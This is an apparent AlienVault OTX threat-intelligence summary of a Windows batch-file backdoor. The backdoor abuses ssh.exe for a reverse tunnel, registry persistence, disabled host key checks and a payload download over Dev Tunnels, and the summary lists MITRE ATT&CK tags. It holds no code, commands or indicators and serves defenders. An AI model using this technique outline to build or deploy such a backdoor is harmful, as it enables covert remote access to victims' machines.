A Windows batch file has been discovered that abuses the ssh.exe tool in modern Windows versions to create a backdoor. The script adds a registry entry for persistence and uses SSH to set up a reverse tunnel, allowing remote access. It also downloads and executes a malicious file using a Dev Tunnels URL, a Microsoft feature similar to ngrok. The script disables host key verification and enables local command execution through SSH. While the specific malicious payload (Ghost.exe) is no longer available, it is suspected to be a Remote Access Trojan (RAT). This technique demonstrates the creative misuse of legitimate tools for malicious purposes. Author: AlienVault
Related Tags:
T1021.004
T1547.001
SSH
T1572
T1059.003
T1571
T1105
AlienVault OTX
AlienVault
Associated Indicators:
null